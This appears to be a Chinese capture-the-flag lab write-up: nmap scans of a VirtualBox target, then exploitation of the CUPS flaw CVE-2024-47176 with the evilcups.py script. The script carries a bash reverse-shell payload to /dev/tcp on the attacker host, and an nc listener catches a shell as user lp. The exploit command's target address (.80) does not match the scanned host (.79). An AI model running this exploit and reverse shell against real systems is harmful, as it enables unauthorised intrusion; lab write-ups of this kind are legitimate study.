┌──(root㉿kali)-[~/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 14:57 +0800 Nmap scan report for 192.168.2.1 Host is up (0.00067s latency). MAC Address: 0A:00:27:00:00:08 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00050s latency). MAC Address: 08:00:27:26:AF:F0 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.79 Host is up (0.0022s latency). MAC Address: 08:00:27:5D:30:3A (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.04 seconds
靶机IP:192.168.2.79
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.79 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 14:58 +0800 Nmap scan report for 192.168.2.79 Host is up (0.00052s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 631/tcp open ipp MAC Address: 08:00:27:5D:30:3A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,631 192.168.2.79 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 14:58 +0800 Nmap scan report for 192.168.2.79 Host is up (0.0012s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) |_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.56 (Debian) 631/tcp open ipp CUPS 2.3 |_http-title: Inicio - CUPS 2.3.3op2 |_http-server-header: CUPS/2.3 IPP/2.1 | http-robots.txt: 1 disallowed entry |_/ MAC Address: 08:00:27:5D:30:3A (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/miaosec] └─# nmap -sU --top-ports 100 192.168.2.79 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 14:59 +0800 Nmap scan report for 192.168.2.79 Host is up (0.0029s latency). Not shown: 97 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc 631/udp open|filtered ipp 5353/udp open zeroconf MAC Address: 08:00:27:5D:30:3A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 116.97 seconds
二、WEB渗透
1、80端口
访问80端口,没有有用的信息
1 2 3 4 5 6 7 8 9
┌──(root㉿kali)-[~/miaosec] └─# curl http://192.168.2.79 <html> <body> <h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body> </html>
┌──(myenv)─(root㉿kali)-[~/miaosec/CVE-2024-47176/evil-cups] └─# python3 evilcups.py 192.168.2.4 192.168.2.80 "bash -c 'bash -i >& /dev/tcp/192.168.2.4/443 0>&1'" IPP Server Listening on ('192.168.2.4', 12345) Sending udp packet to 192.168.2.80:631... Please wait this normally takes 30 seconds... 0 elapsed target connected, sending payload ... 9 elapsed
点击打印机
打印测试页
成功获取到shell
1 2 3 4 5 6 7 8 9
┌──(root㉿kali)-[~/miaosec] └─# nc -lvnp 443 listening on [any] 443 ... connect to [192.168.2.4] from (UNKNOWN) [192.168.2.79] 50718 bash: cannot set terminal process group (616): Inappropriate ioctl for device bash: no job control in this shell lp@fuser:/$ id id uid=7(lp) gid=7(lp) groups=7(lp)
